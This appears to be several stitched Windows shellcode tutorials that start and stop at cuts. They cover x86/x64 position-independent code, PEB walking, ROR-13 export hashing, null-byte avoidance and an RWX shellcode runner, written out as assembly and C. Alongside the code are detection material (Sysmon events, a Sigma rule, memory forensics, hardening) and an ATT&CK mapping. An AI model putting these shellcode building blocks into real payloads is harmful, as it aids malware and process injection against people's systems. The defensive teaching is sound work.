Process Injection	`T1055`	Sysmon `8`/`10`; Sigma on `GrantedAccess` + `CallTrace: UNKNOWN`
PE Injection	`T1055.002`	Shellcode written into another process; RWX region creation
Reflective Code Loading	`T1620`	Execution from unbacked memory; pe-sieve / Moneta

Summary

XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

References

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.

1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).

2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

Architecture	Instruction	Result
x86	`MOV EAX, FS:[0x30]`	`EAX` ← `TEB.ProcessEnvironmentBlock` (PEB)
x64	`MOV RAX, GS:[0x60]`	`RAX` ← `TEB.ProcessEnvironmentBlock` (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct	Field	x86 offset	x64 offset
`_TEB`	`ProcessEnvironmentBlock`	`+0x030`	`+0x060`
`_PEB`	`Ldr`	`+0x00C`	`+0x018`
`_PEB_LDR_DATA`	`InLoadOrderModuleList`	`+0x00C`	`+0x010`
`_PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x014`	`+0x020`
`_PEB_LDR_DATA`	`InInitializationOrderModuleList`	`+0x01C`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`DllBase`	`+0x018`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`BaseDllName`	`+0x02C`	`+0x058`

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field — Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.

5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].

Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime — The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.

7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.

8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

Avoid	Use instead	Reason
`mov rax, 0` (`48 C7 C0 00 00 00 00`)	`xor rax, rax`	Removes four NUL bytes
`push 0` (`6A 00`)	`xor reg, reg; push reg`	`6A 00` contains a NUL
Short jumps spanning NUL displacements	Pad with `nop` or reorder code	Avoids NUL in the offset byte
`mov al, 0x00`	`xor al, al`	Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.

9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.

10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.

11. Common Attacker Techniques

Technique	Description
PEB walking	Resolve `kernel32`/`ntdll` bases via `GS:[0x60]` / `FS:[0x30]` without imports
Export hash resolution	ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings	Push immediates to materialise `"cmd.exe"`, `"WinExec"`, etc., on the stack
Reflective loading	PIC stub maps a full DLL into memory and calls its `DllMain` (T1620)
Remote injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` into a target PID
APC queuing	`QueueUserAPC` to deliver shellcode into an alertable thread
Process hollowing	Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping	Overwrite the `.text` of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID	Signal
`1`	Process creation (with command line) — anomalous parents (`winword.exe` → `cmd.exe`)
`7`	`ImageLoad` from user-writable paths into system processes
`8`	`CreateRemoteThread` — primary remote-injection signal
`10`	`ProcessAccess` with `GrantedAccess` containing `0x1F0FFF`, `0x1410`, or `PROCESS_VM_WRITE \\| PROCESS_VM_OPERATION \\| PROCESS_CREATE_THREAD`
`17`/`18`	Named pipe creation/connection (common C2 channel)
`25`	`ProcessTampering` (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

Mitigation	Effect
ACG (`ProcessDynamicCodePolicy`)	Forbids new executable pages; breaks `VirtualAlloc(PAGE_EXECUTE_READWRITE)`
DEP / NX	Hardware-enforced non-execute on data pages
CFG	Invalidates indirect calls to non-registered targets
HVCI	Hypervisor-enforced kernel code integrity
ASR rules	Block office/script children, untrusted USB execution, etc.
Restrict `SeDebugPrivilege`	Limits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations — Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool	Description	Link
WinDbg	Verify struct offsets (`dt ntdll!_PEB`, `dt ntdll!_LDR_DATA_TABLE_ENTRY`)	microsoft.com
NASM	Assemble x86/x64 PIC payloads in Intel syntax	nasm.us
x64dbg	Dynamic analysis of shellcode in a loader harness	x64dbg.com
Ghidra / IDA	Static disassembly of extracted opcodes	ghidra-sre.org
Process Hacker	Inspect process memory regions and protections	processhacker.sf.io
`pe-sieve`	Hunts injected, hollowed, or stomped modules	github.com/hasherezade/pe-sieve
Volatility 3	`malfind`, `ldrmodules`, `vadinfo` for memory-resident PIC	volatilityfoundation.org
YARA	Signature ROR-13 loops, PEB-walk prologues, hash tables	virustotal.github.io/yara
SilkETW	Subscribe to THREATINT and Kernel-Process providers	github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Reflective Code Loading	`T1620`	Volatility `malfind` / `ldrmodules`; THREATINT ETW
Process Injection (parent)	`T1055`	Sysmon EID `10` + EID `8`; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL	`T1055.001`	Sysmon EID `7` from unusual paths; `pe-sieve`
Process Injection: APC	`T1055.004`	Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing	`T1055.012`	Sysmon EID `25` ProcessTampering; `pe-sieve` hollowing scan
Obfuscated Files or Information	`T1027`	YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter	`T1059`	EID `4688` / Sysmon EID `1` with command-line auditing

Summary

Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

References

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.

Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX. — The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
It is owned by the caller. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`

Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.

Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention. — The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x28                  ; shadow + 8 to keep call-time alignment

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = address of next instruction
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (from `InMemoryOrderLinks`)	`+0x030`

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x30]     ; DllBase relative to InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address. — Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (RVA of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx eax, byte [rsi]
    test  al, al
    jz    .check
    ror   edi, 13
    add   edi, eax
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` → nulls	`xor eax, eax` then `mov eax, 0x7FFE1234` (zero-extends)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor rcx, rcx` ; `push rcx`
`mov rcx, 0` → 7-byte null run	`xor ecx, ecx`

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

